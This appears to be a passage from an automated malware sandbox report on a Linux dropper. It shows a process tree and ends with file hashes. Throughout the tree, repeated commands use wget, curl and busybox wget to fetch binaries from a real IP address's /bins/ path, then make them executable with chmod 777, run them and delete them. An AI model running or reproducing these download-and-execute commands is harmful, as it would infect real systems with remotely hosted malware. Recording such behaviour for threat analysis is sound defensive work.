/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:932
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:938
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:944
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:950
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:956
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:962
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:968
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:974
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:980
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97